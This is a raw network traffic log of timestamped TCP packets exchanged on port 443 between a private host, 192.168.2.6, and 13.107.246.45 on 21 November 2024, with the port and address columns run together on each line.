                                                                                                                                                                                                            Nov 21, 2024 15:18:25.655973911 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.677970886 CET4434996313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.681370974 CET4434996313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.681478977 CET49963443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.681526899 CET49963443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.681526899 CET49963443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.681548119 CET4434996313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.681557894 CET4434996313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.683927059 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.683958054 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.684076071 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.684257030 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.684273005 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.779393911 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.780657053 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.780831099 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.781590939 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:25.781622887 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.056396008 CET4434996413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.058602095 CET4434996413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.058659077 CET49964443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.058717012 CET49964443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.058732986 CET4434996413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.063286066 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.063337088 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.063417912 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.063543081 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.063550949 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.099345922 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.099374056 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.099441051 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.099442005 CET49965443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.099505901 CET49965443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.099704027 CET49965443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.099704027 CET49965443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.099723101 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.099731922 CET4434996513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.102418900 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.102473021 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.102612972 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.103022099 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.103034973 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.213465929 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.216854095 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.216921091 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.216939926 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.216969013 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.217020035 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.217232943 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.217253923 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.217266083 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.217272043 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.220077991 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.220118999 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.220206022 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.220338106 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.220349073 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.506488085 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.507047892 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.507075071 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.507513046 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.507519960 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.956618071 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.959701061 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.959863901 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.959947109 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.959995031 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.959995031 CET49967443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.960011005 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.960020065 CET4434996713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.962533951 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.962564945 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.962685108 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.962800980 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:26.962811947 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:27.472345114 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:27.472826958 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:27.472913027 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:27.473360062 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:27.473376989 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:27.855926037 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:27.856647968 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:27.856681108 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:27.857345104 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:27.857350111 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:27.888281107 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:27.888873100 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:27.888921976 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:27.889856100 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:27.889879942 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.058784962 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.062031984 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.062124014 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.062216043 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.062216997 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.062263012 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.062294006 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.065218925 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.065264940 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.065365076 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.065515995 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.065534115 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.159499884 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.160010099 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.160043001 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.160511017 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.160516024 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.298461914 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.301322937 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.301386118 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.301415920 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.301493883 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.301518917 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.301548004 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.301559925 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.301568031 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.301578999 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.301583052 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.304433107 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.304486036 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.304652929 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.304836988 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.304857969 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.332704067 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.335876942 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.335952044 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.336071968 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.336090088 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.336121082 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.336127996 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.339245081 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.339299917 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.339592934 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.339623928 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.339631081 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.613418102 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.613447905 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.613502979 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.613509893 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.613559008 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.613796949 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.613816023 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.613828897 CET49971443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.613835096 CET4434997113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.616718054 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.616765976 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.616889000 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.617047071 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.617062092 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.819820881 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.820493937 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.820516109 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.820893049 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:28.820899963 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.273092985 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.275675058 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.275732994 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.275732994 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.275770903 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.275880098 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.275896072 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.275935888 CET49972443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.275943041 CET4434997213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.278508902 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.278554916 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.278753996 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.278913021 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.278929949 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.865185022 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.865674019 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.865689039 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.866156101 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:29.866161108 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.152596951 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.153433084 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.153450012 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.153681040 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.153697968 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.174078941 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.174712896 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.174726009 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.175281048 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.175287962 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.384632111 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.387520075 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.387595892 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.387661934 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.387763023 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.387763023 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.389497995 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.389518976 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.391685963 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.391733885 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.391947985 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.392240047 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.392252922 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.496934891 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.497493029 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.497517109 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.498188019 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.498197079 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.625907898 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.628647089 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.628709078 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.628782988 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.628782988 CET49974443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.628798962 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.628818989 CET4434997413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.631416082 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.631460905 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.631639957 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.631829023 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.631839991 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.671441078 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.673021078 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.673074007 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.673156023 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.673156023 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.673176050 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.673185110 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.675959110 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.675997019 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.676069021 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.676222086 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.676234007 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.942734957 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.946129084 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.946229935 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.948288918 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.948318958 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.948335886 CET49976443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.948343039 CET4434997613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.953262091 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.953299046 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.953510046 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.953674078 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:30.953682899 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.151537895 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.152147055 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.152170897 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.152755022 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.152767897 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.595664978 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.598727942 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.598792076 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.598927021 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.599009037 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.599014044 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.599025011 CET49977443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.599030018 CET4434997713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.601845980 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.601881981 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.602103949 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.602243900 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:31.602261066 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.190877914 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.191433907 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.191450119 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.192029953 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.192055941 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.416096926 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.416600943 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.416621923 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.417253017 CET49979443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.417259932 CET4434997913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.460597992 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.461301088 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.461335897 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.461802006 CET49980443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.461807966 CET4434998013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.636964083 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.637032986 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.637099981 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.637336969 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.637347937 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.637362957 CET49978443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.637368917 CET4434997813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.640656948 CET49983443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.640697002 CET4434998313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.640763044 CET49983443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.640923977 CET49983443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.640933990 CET4434998313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.689915895 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.694072962 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:32.694084883 CET4434998113.107.246.45192.168.2.6
